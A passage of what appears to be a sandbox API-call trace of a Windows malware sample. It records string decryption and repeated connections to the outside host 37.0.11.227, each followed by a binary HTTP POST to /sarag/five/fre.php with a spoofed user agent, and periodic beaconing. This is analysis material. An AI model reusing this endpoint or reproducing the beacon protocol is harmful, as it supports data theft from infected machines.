(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.241] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.246] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.247] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.248] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.249] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.250] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.250] GetProcessHeap () returned 0x690000 [0253.250] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0253.250] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.250] GetProcessHeap () returned 0x690000 [0253.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0253.251] GetProcessHeap () returned 0x690000 [0253.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.253] GetProcessHeap () returned 0x690000 [0253.253] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0253.258] GetProcessHeap () returned 0x690000 [0253.258] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0253.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.259] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.265] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.265] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0253.304] GetProcessHeap () returned 0x690000 [0253.304] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0253.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.307] CryptImportKey (in: hProv=0x6af100, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.309] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.310] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.310] GetProcessHeap () returned 0x690000 [0253.310] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0253.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.311] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0253.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.312] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.313] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0253.313] GetProcessHeap () returned 0x690000 [0253.313] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.314] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0253.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.315] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0253.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.318] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0253.319] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.320] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0253.320] GetProcessHeap () returned 0x690000 [0253.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0253.320] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0253.320] GetProcessHeap () returned 0x690000 [0253.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0253.320] socket (af=2, type=1, protocol=6) returned 0x728 [0253.320] connect (s=0x728, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0253.351] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0253.352] GetProcessHeap () returned 0x690000 [0253.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0253.352] GetProcessHeap () returned 0x690000 [0253.352] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0253.353] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.354] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.354] GetProcessHeap () returned 0x690000 [0253.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0253.354] GetProcessHeap () returned 0x690000 [0253.355] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.355] GetProcessHeap () returned 0x690000 [0253.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0253.355] GetProcessHeap () returned 0x690000 [0253.355] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0253.356] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.358] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.358] GetProcessHeap () returned 0x690000 [0253.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0253.358] GetProcessHeap () returned 0x690000 [0253.358] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.358] send (s=0x728, buf=0x6ad508*, len=242, flags=0) returned 242 [0253.359] send (s=0x728, buf=0x6aba40*, len=159, flags=0) returned 159 [0253.359] GetProcessHeap () returned 0x690000 [0253.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0253.359] recv (in: s=0x728, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0253.439] GetProcessHeap () returned 0x690000 [0253.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0253.440] GetProcessHeap () returned 0x690000 [0253.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0253.440] GetProcessHeap () returned 0x690000 [0253.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0253.440] GetProcessHeap () returned 0x690000 [0253.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0253.441] closesocket (s=0x728) returned 0 [0253.441] GetProcessHeap () returned 0x690000 [0253.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0253.441] GetProcessHeap () returned 0x690000 [0253.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.442] GetProcessHeap () returned 0x690000 [0253.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0253.442] GetProcessHeap () returned 0x690000 [0253.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0253.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14b4) returned 0x728 [0253.452] Sleep (dwMilliseconds=0xea60) [0253.454] GetProcessHeap () returned 0x690000 [0253.454] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0253.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.462] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0253.468] GetProcessHeap () returned 0x690000 [0253.468] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0253.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.470] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.473] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.474] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.474] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.474] GetProcessHeap () returned 0x690000 [0253.475] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0253.475] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.476] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0253.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.477] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.494] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0253.494] GetProcessHeap () returned 0x690000 [0253.494] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.495] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.496] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.497] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.498] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.498] GetProcessHeap () returned 0x690000 [0253.498] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0253.498] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.498] GetProcessHeap () returned 0x690000 [0253.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0253.499] GetProcessHeap () returned 0x690000 [0253.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.499] GetProcessHeap () returned 0x690000 [0253.499] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0253.499] GetProcessHeap () returned 0x690000 [0253.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0253.500] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.500] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.520] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0253.529] GetProcessHeap () returned 0x690000 [0253.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0253.530] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.530] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.533] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.534] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.534] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.535] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.535] GetProcessHeap () returned 0x690000 [0253.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0253.536] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.537] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0253.538] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.538] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.539] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.539] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0253.539] GetProcessHeap () returned 0x690000 [0253.539] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.540] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.540] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0253.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.541] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0253.542] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.543] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0253.543] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.544] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0253.544] GetProcessHeap () returned 0x690000 [0253.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0253.544] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0253.544] GetProcessHeap () returned 0x690000 [0253.544] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0253.544] socket (af=2, type=1, protocol=6) returned 0x72c [0253.544] connect (s=0x72c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0253.571] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0253.571] GetProcessHeap () returned 0x690000 [0253.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0253.571] GetProcessHeap () returned 0x690000 [0253.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b87b8 [0253.572] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.573] wvsprintfA (in: param_1=0x6b87b8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0253.573] GetProcessHeap () returned 0x690000 [0253.573] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0253.573] GetProcessHeap () returned 0x690000 [0253.574] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.574] GetProcessHeap () returned 0x690000 [0253.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0253.574] GetProcessHeap () returned 0x690000 [0253.574] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b87b8 [0253.574] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0253.575] wvsprintfA (in: param_1=0x6b87b8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0253.575] GetProcessHeap () returned 0x690000 [0253.575] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0253.575] GetProcessHeap () returned 0x690000 [0253.576] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b87b8 | out: hHeap=0x690000) returned 1 [0253.576] send (s=0x72c, buf=0x6ad508*, len=242, flags=0) returned 242 [0253.577] send (s=0x72c, buf=0x6aba40*, len=159, flags=0) returned 159 [0253.577] GetProcessHeap () returned 0x690000 [0253.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0253.577] recv (in: s=0x72c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0253.652] GetProcessHeap () returned 0x690000 [0253.653] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0253.654] GetProcessHeap () returned 0x690000 [0253.654] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0253.654] GetProcessHeap () returned 0x690000 [0253.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0253.655] GetProcessHeap () returned 0x690000 [0253.655] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0253.655] closesocket (s=0x72c) returned 0 [0253.656] GetProcessHeap () returned 0x690000 [0253.656] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0253.656] GetProcessHeap () returned 0x690000 [0253.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0253.657] GetProcessHeap () returned 0x690000 [0253.657] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0253.658] GetProcessHeap () returned 0x690000 [0253.658] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0253.659] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14b8) returned 0x72c [0253.661] Sleep (dwMilliseconds=0xea60) [0253.662] GetProcessHeap () returned 0x690000 [0253.662] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0253.663] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.664] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.705] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0253.710] GetProcessHeap () returned 0x690000 [0253.710] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0253.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.711] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0253.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.714] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.715] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.715] GetProcessHeap () returned 0x690000 [0253.716] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0253.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.727] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0253.728] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.730] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0253.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0253.732] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0253.732] GetProcessHeap () returned 0x690000 [0253.732] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0253.736] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.740] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.741] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.742] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.742] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.743] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.744] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0253.744] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.745] GetProcessHeap () returned 0x690000 [0253.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0253.745] getaddrinfo (in: 